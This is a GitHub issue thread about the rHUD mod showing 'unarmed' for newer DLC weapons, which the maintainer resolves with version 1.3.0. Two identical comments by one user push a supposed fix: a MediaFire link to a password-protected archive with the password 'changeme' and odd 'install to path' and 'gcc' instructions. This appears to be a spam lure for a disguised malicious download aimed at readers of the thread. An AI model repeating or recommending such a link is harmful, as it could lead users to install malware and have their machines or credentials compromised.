### ISSUE TITLE
Missing weapons

### ISSUE THREAD

**Issue by ElfenRP** [Raxdiam/rHUD#1]
Hud displays unarmed with some of the newer DLC weapons. Like the snowball launcher, stun baton, candy cane, battle rifle, service rifle.
Maybe there should be a fail-safe(in case you have addon weapons- pulls generic icon for w/e the weapon style is)

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Raxdiam** [comment]
Resolved with version 1.3.0
[Changelog](https://github.com/Raxdiam/rHUD/blob/main/CHANGELOG.md)
